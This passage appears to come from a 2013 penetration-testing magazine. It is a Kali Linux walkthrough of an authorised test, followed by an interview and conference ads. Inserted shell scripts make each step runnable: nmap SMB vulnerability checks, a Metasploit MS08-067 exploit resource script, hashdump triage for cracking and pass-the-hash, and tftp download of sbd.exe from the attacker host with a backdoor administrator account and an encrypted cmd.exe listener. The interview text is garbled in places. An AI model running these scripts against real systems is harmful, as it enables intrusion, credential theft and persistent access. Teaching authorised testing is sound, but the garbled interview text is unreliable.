Once we have completed Information Gathering we need to start enumerating discovered networks and services. Kali again saves the day by giving us all the tools we need in one location. While in the normal course of our engagements we would turn to nmap, we wanted to cover a couple of other lesser known scanners, starting with fping and hping3.
So, using our case study, now that we have discovered hosts within our domain we will utilize fping to identify systems on our target network (Figure 8). Based on the output of fping we know that ICMP is enabled and that we were able to enumerate our target network. Now we select one of our hosts and perform a SYN scan with hping3 (Figure 9). Using our list of services we can run nmap against the open ports to identify operating system and service versions (Figure 10).

Figure 8. Fping Example
Figure 9. Hping3 Example
Figure 10. NMAP Service Identification Example

Next we are going to leverage nmap's vulnerability scanner to check for SMB vulnerabilities on this host. First, let's quickly look at nmap's scripting parameters (Figure 11). If you are interested you can take a look at the scripts supplied with nmap. On Kali you can find them in /usr/share/nmap/scripts. After doing a bit of searching we come across smb-check-vulns (Figure 12).
After looking at nmap's documentation we find that this script can be used to identify vulnerability conditions with SMB. We also learn that we need to supply an unsafe flag to get it to fully run our scan. With consequences in mind, and more importantly permission to impact system availability, we run our scan (Figure 13).
We have come to the end of this phase of Discovery. We now have enough information to begin the attack phase of our penetration test against our target environment.
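The fping, nmap and smb-check-vulns steps above, chained into one script. This is an added example and not the authors' code: the scope range 10.0.0.0/24, the output directory and the nmap -oG sample it parses are constructed for the example. Beyond the walkthrough it adds the two gates a tester wants in front of the unsafe SMB check: a rules-of-engagement scope test on every candidate host, and an explicit ALLOW_UNSAFE switch standing in for the client's written permission to risk a service crash.

```shell
#!/bin/sh
# Added example, not from the article: the fping -> nmap -> smb-check-vulns chain
# of the walkthrough as one script, with two checks in front of the "unsafe" SMB
# scan: is the host inside the agreed scope, and has the client accepted that
# the MS08-067 probe may crash the service? SCOPE_CIDRS, OUTDIR and the sample
# nmap output are constructed for this example.

SCOPE_CIDRS="10.0.0.0/24"             # rules of engagement (assumed)
OUTDIR="${OUTDIR:-./discovery}"

# fping -a prints only hosts that answered, -g expands the CIDR into targets.
sweep_hosts() {                        # $1 = CIDR  -> one live IP per line
    fping -a -g "$1" 2>/dev/null
}

# Service/version/OS scan of the live hosts; -oA writes .nmap/.gnmap/.xml so the
# XML can go into Dradis and the grepable file is parsed below.
scan_services() {                      # $1 = file with one IP per line
    nmap -sS -sV -O -p 1-1024,3389 -iL "$1" -oA "$OUTDIR/services"
}

# Parse nmap grepable (-oG) text on stdin into "ip port/proto service" lines for
# open ports. A -oG port entry looks like 445/open/tcp//microsoft-ds///
open_ports() {
    awk '/Ports:/ {
        ip = $2
        sub(/.*Ports: /, "")
        n = split($0, entries, /, /)
        for (i = 1; i <= n; i++) {
            split(entries[i], f, "/")
            if (f[2] == "open") print ip, f[1] "/" f[3], f[5]
        }
    }'
}

# Hosts with 445/tcp open are the candidates for smb-check-vulns.
smb_hosts() { open_ports | awk '$2 == "445/tcp" { print $1 }' | sort -u; }

# IPv4-in-CIDR test in plain awk: drop the host bits and compare network parts.
ip_in_cidr() {                         # $1 = a.b.c.d  $2 = a.b.c.d/bits -> 0 if inside
    awk -v ip="$1" -v cidr="$2" '
        function toint(s,  o) { split(s, o, "."); return ((o[1]*256 + o[2])*256 + o[3])*256 + o[4] }
        BEGIN {
            split(cidr, c, "/"); hostbits = 32 - c[2]
            exit !(int(toint(ip) / 2^hostbits) == int(toint(c[1]) / 2^hostbits))
        }'
}

in_scope() {                           # $1 = ip -> 0 if some SCOPE_CIDRS entry contains it
    for cidr in $SCOPE_CIDRS; do
        ip_in_cidr "$1" "$cidr" && return 0
    done
    return 1
}

# nmap keeps the crash-prone MS08-067 test behind --script-args=unsafe=1. Pass it
# only with explicit permission (ALLOW_UNSAFE=1), and never to a host out of scope.
smb_vuln_scan() {                      # $1 = ip
    in_scope "$1" || { echo "refusing $1: outside the rules of engagement" >&2; return 2; }
    if [ "${ALLOW_UNSAFE:-0}" = 1 ]; then
        nmap -p445 --script smb-check-vulns --script-args=unsafe=1 "$1" -oA "$OUTDIR/smb-$1"
    else
        echo "ALLOW_UNSAFE not set: running only the safe SMB checks against $1" >&2
        nmap -p445 --script smb-check-vulns "$1" -oA "$OUTDIR/smb-$1"
    fi
}

# Constructed sample of nmap -oG output so the parsing can be exercised offline.
SAMPLE_GNMAP='# Nmap 6.25 scan initiated (constructed sample)
Host: 10.0.0.5 ()  Status: Up
Host: 10.0.0.5 ()  Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///  Ignored State: closed (1021)
Host: 10.0.0.9 ()  Ports: 22/open/tcp//ssh//OpenSSH 5.9p1/, 80/open/tcp//http//Apache httpd 2.2.22/  Ignored State: closed (1022)'

# With a CIDR as $1 and the tools installed, run the live chain; otherwise show
# what the parser and the scope check do with the sample.
if [ -n "$1" ] && command -v fping >/dev/null && command -v nmap >/dev/null; then
    mkdir -p "$OUTDIR"
    sweep_hosts "$1" > "$OUTDIR/live.txt"
    scan_services "$OUTDIR/live.txt"
    smb_hosts < "$OUTDIR/services.gnmap" | while read -r ip; do smb_vuln_scan "$ip"; done
else
    printf '%s\n' "$SAMPLE_GNMAP" | open_ports
    printf '%s\n' "$SAMPLE_GNMAP" | smb_hosts | while read -r ip; do
        if in_scope "$ip"; then echo "SMB candidate in scope: $ip"; else echo "out of scope: $ip"; fi
    done
fi
```

Run it with a CIDR argument on a Kali box that has fping and nmap to use it live; with no argument it only exercises the parser and the scope check against the embedded sample. The XML that -oA writes is the file to import into Dradis.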

Figure 11. NMAP Script Options
Figure 12. NMAP Script Directory
Figure 13. NMAP smb-check-vulns Output Against Target Host

Attack

Gaining Access
Now that we have identified several vulnerabilities as well as the likelihood of exploitation we decide to try and exploit the MS08-067 vulnerability identified with our nmap scan. We leverage the Metasploit framework to begin our initial attack vector.
Metasploit is very powerful and could be used for various phases within our methodology. That being said, Kali provides many options that can be leveraged to meet our testing objectives. In this particular case Metasploit provides a perfect vehicle to exploit this particular vulnerability.
Prior to launching Metasploit we need to start up the PostgreSQL database and the Metasploit server component. These are not configured to start on boot by default in Kali (Figure 14).
Next, we launch the Met
asploit console with the msfconsole command. After doing an initial search we discover that Metasploit does have an exploit for MS08-067. We configure the exploit with the bind shell Meterpreter payload to make us work a bit harder for our objectives. Once all the options are configured we run the exploit using the exploit command (Figure 15).
Success! We have exploited our vulnerability and have gained access to our system.

Figure 14. Metasploit Initialization and MSFConsole Startup
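The msfconsole steps behind Figures 14 and 15, captured as a resource script so the attack can be re-run exactly. This is an added example, not the authors' code or anything shipped with Metasploit: RHOST, LPORT, the workspace name and the rc file path are assumed values, while the module and payload names are Metasploit's own. It puts the module's check command before exploit, so a patched host is reported instead of being hit with the overflow.

```shell
#!/bin/sh
# Added example, not from the article: the msfconsole session of the walkthrough
# as a repeatable resource script. RHOST, LPORT, workspace and file path are
# assumed values for this example.
RHOST="${RHOST:-10.0.0.5}"        # the host smb-check-vulns flagged (assumed)
LPORT="${LPORT:-4444}"            # bind_tcp: the target listens here, Kali connects in
RC_FILE="${RC_FILE:-./ms08_067.rc}"

# Kali 1.x does not start these on boot. msfconsole wants the database for
# workspaces, db_import of nmap XML and the creds/loot tables used in reporting.
start_services() {
    service postgresql start
    service metasploit start
}

# Resource-file contents. 'check' runs the module's own vulnerability test before
# anything is sent that could crash the service; 'exploit -z' backgrounds the
# session so the script can go on to list it.
build_rc() {                      # $1 = RHOST  $2 = LPORT  -> rc text on stdout
cat <<EOF
workspace -a nist-800-115
use exploit/windows/smb/ms08_067_netapi
set RHOST $1
set PAYLOAD windows/meterpreter/bind_tcp
set LPORT $2
check
exploit -z
sessions -l
EOF
}

# With a target as $1 (and optional port as $2) on a box that has msfconsole,
# start the services, write the rc file and run it; otherwise just print the rc.
if [ -n "$1" ] && command -v msfconsole >/dev/null; then
    start_services
    build_rc "$1" "${2:-$LPORT}" > "$RC_FILE"
    msfconsole -q -r "$RC_FILE"
else
    build_rc "$RHOST" "$LPORT"
fi
```

With a bind payload the firewall question is on the target side: LPORT must be reachable from Kali, which is usually the case on the same segment you just swept but worth confirming before blaming the exploit.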



Figure 15. Metasploit MS08-067 Exploit With Meterpreter Payload

System Browsing
Now we'd like to validate our access as well as upload additional tools to gather information and launch further attacks (Figure 16). After confirming that we are running as SYSTEM, we decide that we should dump hashes in order to help with attacks against other systems (Figure 17).

Figure 16. Meterpreter Getuid Output On Target Host

Once we have the hashes we can launch John on our Kali system to crack the administrator password. On many networks the administrator account password will be the same across all systems or groups of systems, so this will come in handy as we continue to exploit our target network (Figure 18).
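Before the hashdump goes to John it is worth a triage pass, shown here as an added example (not the authors' code). The hashdump lines are constructed for the example; their layout is the pwdump format user:RID:LM:NT::: that Meterpreter's hashdump prints, and the wordlist path is Kali's default and an assumption. The pass flags stored LM hashes, empty passwords and NT hashes shared between accounts, which is where the "same administrator password everywhere" observation above becomes a concrete list of reusable credentials.

```shell
#!/bin/sh
# Added example, not from the article: triage Meterpreter hashdump output before
# handing it to John. Sample lines are constructed; the wordlist path is assumed.
EMPTY_LM=aad3b435b51404eeaad3b435b51404ee   # LM field when LM storage is disabled
EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0   # NT hash of the empty password
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"

# Constructed sample. 8846f7ea... is the NT hash of "password" and e52cac67... its
# LM hash; the jsmith NT value is arbitrary filler.
SAMPLE_HASHDUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
jsmith:1002:aad3b435b51404eeaad3b435b51404ee:2b2ac2d1c7c8fda6cea80b5fad7563aa:::'

# Accounts whose LM hash is stored: LM upper-cases the password and DES-encrypts
# two 7-byte halves independently, so it falls to rainbow tables or john
# --format=lm in minutes. Worth its own finding in the report.
lm_enabled_accounts() { awk -F: -v e="$EMPTY_LM" '$3 != e { print $1 }'; }

# Accounts with an empty password (the NT hash of "").
empty_password_accounts() { awk -F: -v e="$EMPTY_NT" '$4 == e { print $1 }'; }

# NT hashes shared by more than one account: password reuse, and the hash alone
# is enough for pass-the-hash wherever that account is local.
shared_nt_hashes() {                   # prints "nthash user1 user2 ..." per reused hash
    awk -F: -v e="$EMPTY_NT" '
        $4 != e { n[$4]++; users[$4] = users[$4] " " $1 }
        END { for (h in n) if (n[h] > 1) print h users[h] }' | sort
}

# Cracking order: LM first (fast, yields the case-insensitive password), then NT
# with the wordlist. John reads the pwdump format directly.
crack_with_john() {                    # $1 = hashdump file
    if [ -n "$(lm_enabled_accounts < "$1")" ]; then
        john --format=lm --wordlist="$WORDLIST" "$1"
    fi
    john --format=nt --wordlist="$WORDLIST" "$1"
    john --format=nt --show "$1"
}

triage() {                             # $1 = hashdump file -> report on stdout
    echo "LM hashes present (crack with --format=lm):"
    lm_enabled_accounts < "$1" | sed 's/^/  /'
    echo "Empty passwords:"
    empty_password_accounts < "$1" | sed 's/^/  /'
    echo "NT hash reused across accounts:"
    shared_nt_hashes < "$1" | sed 's/^/  /'
}

# Use the file given as $1, or fall back to the constructed sample.
if [ -n "$1" ]; then
    HASHFILE="$1"
else
    HASHFILE=$(mktemp); printf '%s\n' "$SAMPLE_HASHDUMP" > "$HASHFILE"
fi
triage "$HASHFILE"
if command -v john >/dev/null && [ -f "$WORDLIST" ]; then crack_with_john "$HASHFILE"; fi
```

On Kali the wordlist ships as rockyou.txt.gz and has to be gunzipped once; with a real hashdump, the shared-hash list is the set of accounts to try with pass-the-hash (for instance Metasploit's psexec module) before any cracking has finished.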

Figure 17. Meterpreter Hashdump Output On Target Host
Figure 18. John Usage On Kali To Crack Target Hashed Passwords

Installing Additional Tools
Once we dump hashes we decide to upload some additional tools to pivot and launch attacks from our compromised host. While we could download our tool-kits using Meterpreter, we wanted to demonstrate a couple of additional ways to upload tools to our exploited host. In order to continue we drop into a shell (Figure 19). We decide to leverage the Windows tftp.exe client to upload our tool-set. We first need to start the tftp daemon on our Kali instance; the command we ran is shown in Figure 20. Once our tftp server started we downloaded sbd.exe as well as created an administrator account, so we can get back into our target in the future (Figure 21). Next, we launch our backdoor using sbd.exe. Sbd is very similar to Netcat; however, it allows us to encrypt our data channel with a shared secret (Figure 22). We then connect with the sbd client on our Kali machine (Figure 23).
Using this backdoor we can repeat our Discovery process to identify additional hosts or networks and vulnerabilities. We can also use this access to pivot and launch attacks until our objectives are met.

Figure 19. Meterpreter Shell Command Output On Target Host
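The tool delivery and sbd backdoor of Figures 20 to 23 as an added example (not the authors' code): the Kali side, the cmd.exe lines to run from the Meterpreter shell, and a leave-behind log from which the cleanup commands are derived, because an extra local administrator and an encrypted listener are exactly the artefacts a client expects to see removed and documented. KALI_IP, TARGET, the account name, the port and the secret are assumed values.

```shell
#!/bin/sh
# Added example, not from the article: Kali side of the tftp delivery, the
# target-side commands, and a leave-behind log for cleanup and reporting.
# Addresses, account name, port and secret are assumed values for this example.
KALI_IP="${KALI_IP:-10.0.0.2}"
TARGET="${TARGET:-10.0.0.5}"
TFTP_ROOT="${TFTP_ROOT:-/tmp/tftp}"
BD_USER="${BD_USER:-pt_svc}"
BD_PASS="${BD_PASS:-$(head -c 9 /dev/urandom | od -An -tx1 | tr -d ' \n')A!}"  # random, satisfies most complexity policies
SBD_PORT="${SBD_PORT:-4444}"
SBD_KEY="${SBD_KEY:-$(head -c 16 /dev/urandom | od -An -tx1 | tr -d ' \n')}"   # shared secret for sbd -k
LEAVE_BEHIND="${LEAVE_BEHIND:-./leave-behind.log}"

# Serve Kali's copy of sbd.exe over tftp. atftpd serves the directory given as its
# last argument; Windows' tftp.exe needs -i (binary mode) to fetch an executable.
stage_tools() {
    mkdir -p "$TFTP_ROOT"
    cp /usr/share/windows-binaries/sbd.exe "$TFTP_ROOT/"
    atftpd --daemon --port 69 "$TFTP_ROOT"
}

# Lines to paste into the target's cmd.exe (Meterpreter 'shell'): fetch sbd, add
# a local administrator, start a listener bound to cmd.exe that only talks to
# clients holding the same shared secret.
target_commands() {
cat <<EOF
tftp -i $KALI_IP GET sbd.exe
net user $BD_USER $BD_PASS /add
net localgroup administrators $BD_USER /add
sbd.exe -l -p $SBD_PORT -k $SBD_KEY -e cmd.exe
EOF
}

# Kali side: connect with the same secret; without it sbd cannot decrypt the channel.
connect_backdoor() { sbd -k "$SBD_KEY" "$TARGET" "$SBD_PORT"; }

# Everything left on the target, one line per artefact with its undo command, for
# the cleanup step and the report appendix.
record_leave_behind() {                # $1 = log file
    ts=$(date -u +%Y-%m-%dT%H:%M:%SZ)
    {
        echo "$ts $TARGET account:$BD_USER undo: net user $BD_USER /delete"
        echo "$ts $TARGET file:sbd.exe undo: del sbd.exe"
        echo "$ts $TARGET listener:tcp/$SBD_PORT undo: taskkill /F /IM sbd.exe"
    } >> "$1"
}

# cmd.exe lines that reverse target_commands, read back from the log so nothing is forgotten.
cleanup_commands() {                   # $1 = log file -> one undo command per line
    sed -n 's/.* undo: //p' "$1"
}

if [ "${1:-}" = live ] && command -v atftpd >/dev/null; then
    stage_tools
    record_leave_behind "$LEAVE_BEHIND"
    echo "Run these in the Meterpreter shell on $TARGET:"; target_commands
    echo "then connect from Kali with: sbd -k $SBD_KEY $TARGET $SBD_PORT"
else
    LOG=$(mktemp); record_leave_behind "$LOG"
    echo "--- target side ---"; target_commands
    echo "--- cleanup before reporting ---"; cleanup_commands "$LOG"
    rm -f "$LOG"
fi
```

Pass the single argument live on a Kali box with atftpd installed to stage the file and start the daemon; without it the script only prints the command sets. The leave-behind log is the list you work through at the end of the engagement and attach to the report.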

Figure 20. Atftpd Startup on Kali For Tool Delivery
Figure 21. Backdoor Account Creation on Target Host
Figure 22. SBD Backdoor Setup On Target Host
Figure 23. SBD Kali Client Connection To Target Host

Reporting
Documentation is critical to the success of the penetration test. This can be performed through screen-shots or tool output. Since we are using Dradis we ensure that we output all tools to text or XML files as well as take screen-shots where tool output is less efficient.
Some tools provide self-documenting features. Take Metasploit for instance. It provides a database that captures output from various tools as you progress through your penetration test. In addition, Meterpreter has the screenshot feature that allows us to take a screen capture of the victim's desktop. Here is a screenshot from our previously compromised host (Figure 24).

Figure 24. Meterpreter Screenshot Example

Once this data is input or imported into Dradis we can output reports in HTML and Word documents. The screen-shot below should give you the idea (Figure 25).

Figure 25. Dradis Export Example

Conclusion
Kali is a valuable resource when performing penetration testing. Sometimes the tools can seem a bit overwhelming. Leveraging a methodology such as NIST 800-115 will bring some consistency and continuity to your penetration tests.
While we did not cover every tool on the distribution nor demonstrate all mapped tools in our example, we hope this brief introduction will help you formulate a plan of attack when using Kali on engagements, so that you bring a better deliverable to your clients.

Jeff Weekes
Jeff has over 15 years of IT and security services experience. He currently performs penetration testing, web application security assessment, security code review, security strategy, security research, and incident / forensic / network forensic response services for government contractors, financial institutions, retail services, medical device manufacturers, contact centers, cloud solution companies, and SaaS service companies.

Carlos Villalba
Carlos has over 17 years of solid IT experience. He has extensive experience designing, developing, managing and implementing IT security solutions with their training and security components in compliance with IT security standards and best practices. Carlos's experience provides a unique combination of skills and experience. Carlos merged his experience into the academic world by designing and delivering instruction and training at the graduate, undergraduate and professional level while being an active IT security consultant. His experience includes Compliance Assessments, Pen-testing, IT security projects, DIACAP Training Design, Oracle database performance, Open Source Solutions for migration of Learning Management Systems and Database Management Systems. Expert knowledge level of Windows based platforms and Red Hat based systems. Solid experience with Active Directory, VPN, SharePoint, Oracle RDBMS, MS SQL, web application security, DNS, encryption, scripting, ISO17799 and PKI. He has provided services to the Air Force Research Labs, Credit Unions, Universities, Manufacturing companies and small business.



Interview with Jeff Weekes
Especially for you, we have interviewed a pentesting specialist, Jeff Weekes, who has over 15 years of IT and security services experience!

Kali is a superb tool for security experts and pentesters. We would be interested to know how the tools are chosen and how the team members work together to keep the distro updated?
This is a great question! We often have to balance tool choices with functionality, cost, and resource experience. After all we are inevitably in business to make money.
We like open-source tools as they provide a level of visibility into what's really happening. In addition, it allows us to customize and script the tools in a variety of ways, most notably when it comes to managing tool output for reporting.
In the end we leverage both open-source and commercial tools. Here is a quick run down of some of the tools we use in our war chest.
Kali -> Can't live without it!!
Nessus
Qualys
Metasploit Community / Professional
Burpsuite
Wireshark
Customized scripts, shellcode, and command-control applications to evade anti-malware controls.
Keeping tools updated can be a real challenge. We decided long ago that the best method to ensure consistent delivery is dedicated laptops for assessments and penetration testing. Prior to an engagement we perform updates on the various tools. Also, at the end of each engagement we securely delete the laptops, re-install baseline images, and then update tools. In the near future we will be rolling customized Kali images for our assessments. This will allow us to bake in our update routines, leverage snapshots, and lastly minimize the need for additional hardware.

How are the comments of the users treated by the team members who work on Kali when these users make suggestions or report bugs?
We take our clients' feedback very seriously. In the event that we discover issues with what various tools identify we immediately investigate the problem. Because many of the tools are open-source we can take a look at the underlying code. If we identify the problem we attempt to notify the various tool owners through their bug reporting channels. We will also update our team members so they are aware of the problem and can leverage different tools or techniques to ensure the accuracy of our testing.



What you see as the most critical and
current theats affecting the Internet
today?
We continue to see a rise in focused attacks with
clear motivations by the actors. Often these at-
tacks take the form of malware deployed through
browser exploitation kits and targeted at specific
applications. Most of the attacks involve theft of fi-
nancial information such as credit-card numbers or
intellectual property.

What kind of resources Terra Verde uses to


keep abreast of web security issues?
Terra Verde uses a variety of resources to keep
tabs on evolving web security issues and web se-
curity attack techniques. Some of these resources
include Blackhat, Defcon, and OWASP. We also
receive threat feeds from Alien Vault and Emerging
Threats. Lastly, we spend a good amount of time
researching issues and topics located on various
sites on the net.

What are the examples of a recent web


security vulnerability or threats?
Even though there are great frameworks out there
such as Spring, Rails, and Django we still continue
to see SQL injection vulnerabilities. We also come
across our fair share of XSS related vulnerabilities.
In addition, we seem to find continued use of de-
fault passwords. Often these default passwords
are identified for admin accounts that are includ-
ed with various CMS frameworks. Once these ac-
count are compromised skys the limit. You can
often leverage this access to upload a web shell
and pivot from this system. For those starting out
in penetration testing never forget about default
passwords. They can be your best weapon to gain
initial access. For a good read on the power of de-
fault passwords and incident response pickup The
Cuckoos Egg. Its a bit dated but still a great read.

What are the challenges to successfully


deploying or monitoring web intrusion
detection?
Deploying web intrusion detection or web appli-
cation firewalls poses some interesting challeng-
es. The first being the use of SSL. When SSL is
in place it often masks your ability to see attacks
against the web environment. Once you shim or
decrypt the SSL session you are often exposed to
all sorts of interesting data such as passwords and
credit-card numbers. This data can find its way into
IDS and WAF logs and well as expose the data to

EXTRA 05/2013(16)
EXTRA
monitoring staff. Its a good idea to have a strat- Most of the people in my network have made the
egy on how to deal with data spill issues because switch to Kali and have nothing, but good things
they will eventually come up. We usually recom- to say.
mend data masking prior to log entry if the tech-
nology supports it or aggressive data scrubbing on Any idea on what can we expect from the
log files. Remember that the later may create log IT Security software developers? Are there
integrity issues as you have altered the logs. any gaps that need to be filled?
The second major issue is really understanding the Im excited to see where Dradis goes with there
application you are trying to protect. If you are not a SaaS based solution as well as the evolution of
web application developer you may need to become tools like MagicTree. I believe there is a real gap
one or at least understand how the application works around tools for reporting and data management.
at an in depth level. You also need to get the develop- Especially, with RedTeam engagements that in-
ment team involved early and often in the process to volve multiple penetration testers.
ensure successful buyin and deployment.
Do your friends, including IT specialists,
What are the most important steps he/ also have a positive opinion about Kali?
she would recommend for securing a web server or web application?

The most important step in my mind is input validation. I can't say it enough. It's critical that your development teams understand the importance of secure coding techniques and especially input validation. This can be a difficult challenge given most companies focus on application features and time to market. Web Application Firewalls can help, but nothing beats securely developing the code in the first place. Remember they don't and shouldn't re-invent the wheel. There are some great frameworks and libraries out there that can assist. Check out several OWASP projects such as Enterprise Security API (ESAPI) for additional details.

Does the platform produce potential threats? Do you have any precautions for the future users?

Kali does produce some potential threats. Namely around passwords and the potential services that get enabled during the course of penetration testing. To limit both your and your clients' exposure you should ensure the version/tools are updated, password protected (AKA Change the Default), and leverage a host firewall such as iptables. In addition, we recommend encrypting the drive where your artifacts reside as well as scrubbing your penetration testing boxes or images after each engagement. You don't want to end up on the news for exposing your customers' data, especially data collected during the course of a penetration test.

What do you think about the new set of tools? Are you aware of the general opinion about the platform?

Most of the people in my network have made the switch to Kali and have nothing but good things to say.

Have you read our first issue of Kali Linux? Which of the methods described therein are you most interested in?

I did read the first Kali issue. I have to say that I enjoyed all the articles. My favorite was Kali Linux on a Raspberry Pi by Scott Cristie. We've been looking at how we could deploy Kali on a small form factor for covert engagements and this article will give us a jump start on that endeavor.

What do you think about the future of pentesting?

I think penetration testing has a bright future. Technology is moving at an incredibly fast pace. Internet enabled smart meters, cars, and medical devices bring on new challenges and threats. If the past is any indication then penetration testing will be in demand. This shift in technology will require new skill-sets and techniques that penetration testers will need to acquire in order to be successful. I'm also excited about bug bounty programs coming from companies out of Silicon Valley as well as crowdsource initiatives from companies such as Synack. There is some unique opportunity with these initiatives for freelance penetration testers to help strengthen the security postures of these companies and products while making some additional money.

by Milena Bobrowska
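The interviewee's first answer puts allowlist input validation ahead of every other web-application control. As an added illustration of that advice (example code written for this page, not code from the interview, the magazine, or the OWASP ESAPI project), the following Python module validates form fields against per-field allowlist patterns and length limits after canonicalizing the input. The field names, limits and sample submission are constructed for the example; the point it shows beyond the text is why canonicalization (repeated percent-decoding with a round limit, Unicode NFKC folding, rejection of control characters) has to happen before the allowlist check, otherwise an encoded value can pass a pattern that its decoded form would fail.

```python
"""Allowlist input validation with canonicalization.

Added example, not code from the interview or from OWASP ESAPI.
Field names, limits and sample inputs are constructed for illustration.
"""
import re
import unicodedata
from urllib.parse import unquote

# Allowlist rules: describe exactly what a valid value looks like instead of
# trying to enumerate "bad" characters.  (pattern, max length) per field.
FIELD_RULES = {
    "username": (re.compile(r"^[A-Za-z0-9_.-]{3,32}$"), 32),
    "email":    (re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$"), 254),
    "zip_code": (re.compile(r"^[0-9]{5}(-[0-9]{4})?$"), 10),
    "quantity": (re.compile(r"^[0-9]{1,4}$"), 4),
}


class ValidationError(ValueError):
    """Raised when a field fails validation; carries field name and reason."""

    def __init__(self, field, reason):
        super().__init__(f"{field}: {reason}")
        self.field = field
        self.reason = reason


def canonicalize(value, max_rounds=3):
    """Reduce an input to one canonical form before it is checked.

    Percent-decoding repeats until the value stops changing, so a doubly
    encoded value such as %253C is judged on what it finally decodes to.
    If it is still changing after max_rounds, the nesting itself is rejected.
    NFKC folds full-width and other compatibility look-alikes to ASCII.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    else:
        raise ValidationError("<canonicalize>", "excessive nested encoding")
    value = unicodedata.normalize("NFKC", value)
    # Control characters (NUL, CR, LF, ...) never belong in a form field.
    if any(unicodedata.category(ch) == "Cc" for ch in value):
        raise ValidationError("<canonicalize>", "control character present")
    return value


def validate_field(field, raw):
    """Return the canonical value of one field or raise ValidationError."""
    if field not in FIELD_RULES:
        raise ValidationError(field, "unknown field")
    pattern, max_len = FIELD_RULES[field]
    if not isinstance(raw, str):
        raise ValidationError(field, "not a string")
    # Bound the raw size first so decoding cost stays small; a percent
    # escape is three characters, hence the factor of three.
    if len(raw) > max_len * 3:
        raise ValidationError(field, "too long")
    try:
        value = canonicalize(raw)
    except ValidationError as exc:
        raise ValidationError(field, exc.reason) from None
    if len(value) > max_len:
        raise ValidationError(field, "too long")
    if not pattern.fullmatch(value):
        raise ValidationError(field, "does not match allowed format")
    return value


def validate_form(form):
    """Validate every submitted field; return (cleaned values, error messages)."""
    cleaned, errors = {}, []
    for field, raw in form.items():
        try:
            cleaned[field] = validate_field(field, raw)
        except ValidationError as exc:
            errors.append(str(exc))
    return cleaned, errors


if __name__ == "__main__":
    # Constructed sample submission: three fields that should pass, two that should fail.
    sample = {
        "username": "alice_01",
        "email":    "alice%40example.com",   # percent-encoded '@' canonicalizes cleanly
        "zip_code": "12345-6789",
        "quantity": "12abc",                 # fails the digits-only allowlist
        "comment":  "hello",                 # not a known field at all
    }
    ok, bad = validate_form(sample)
    print("accepted:", ok)
    print("rejected:", bad)
```

The design choice worth noting is that every rule is positive: a field is accepted only if its canonical form matches a pattern the developer wrote down, and anything not in FIELD_RULES is rejected outright. That is the "don't re-invent the wheel" point in practice; a library such as ESAPI packages the same canonicalize-then-allowlist discipline so that each team does not have to rediscover the encoding corner cases.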

EXTRA 05/2013(16) Page 82 http://pentestmag.com


A BZ Media Event

Big Data gets real at Big Data TechCon!

Discover how to master Big Data from real-world practitioners: instructors who work in the trenches and can teach you from real-world experience!

Come to Big Data TechCon to learn the best ways to:

- Collect, sort and store massive quantities of structured and unstructured data
- Process real-time data pouring into your organization
- Master Big Data tools and technologies like Hadoop, Map/Reduce, NoSQL databases, and more
- Learn HOW TO integrate data-collection technologies with analysis and business-analysis tools to produce the kind of workable information and reports your organization needs
- Understand HOW TO leverage Big Data to help your organization today

Over 60 how-to practical classes and tutorials to choose from!

"Big Data TechCon is loaded with great networking opportunities and has a good mix of classes with technical depth, as well as overviews. It's a good, technically-focused conference for developers."
Kim Palko, Principal Product Manager, Red Hat

"Big Data TechCon is great for beginners as well as advanced Big Data practitioners. It's a great conference!"
Ryan Wood, Software Systems Analyst, Government of Canada

"If you're in or about to get into Big Data, this is the conference to go to."
Jimmy Chung, Manager, Reports Development, Avectra

San Francisco, October 15-17, 2013
www.BigDataTechCon.com

The HOW-TO conference for Big Data and IT professionals

Big Data TechCon is a trademark of BZ Media LLC.


@tmforumorg #dd13

OCTOBER 28-31, 2013
SAN JOSE, CALIFORNIA

Crashing the party - digital services.

Enabling businesses and enterprises to conquer challenges and seize opportunities presented by the digital world, Digital Disruption, TM Forum's all new, expanded event for the Americas, helps service providers and their partners address vital issues such as reducing cost and risk, improving market retention and growth and increasing revenue by introducing innovative new services. Engage with 150+ expert speakers over four days filled with critical insights, debate, TM Forum training, networking and hands-on opportunities that immerse you in exciting innovations and new ideas.

Not your average conference

Four topic-driven Forums
- Agile Business and IT Forum
- Customer Engagement and Analytics Forum
- Delivering Enterprise Services Forum
- Disruptive Innovation Forum

Innovation Zone:
Explore all things TM Forum; meet companies that are seizing the opportunities the digital world is creating:
- Meet the experts, learn about TM Forum programs and explore our award-winning series of live Catalyst demos, collaborative accelerator projects led by cutting edge service providers and suppliers
- Touch and feel some of the latest disruptive technology that is changing the way we live and work
- Watch live demos and learn more about real digital services that leverage the broad ecosystem
- Discover innovative technology from vendors showcasing their best products and services

Networking

TM Forum Training and MasterClasses

Keynote Speakers include...
- Chet Kapoor, CEO, Apigee
- Daniel Sieberg, Head of Media Outreach & Official Spokesperson, Google
- Dr. Jürgen Meffert, Director (Senior Partner), McKinsey & Company
- Adrian Cockcroft, Director of Architecture, Cloud Systems, Netflix
- Georges Nahon, CEO, Orange Silicon Valley
- Vinay Vaidya, MD, Vice President & Chief Medical Information Officer, Phoenix Children's Hospital

For more information or to register now:
Email: register@tmforum.org | Phone: +1 973 944 5100
Visit: www.tmforum.org/dd13PT

Platinum Sponsor:
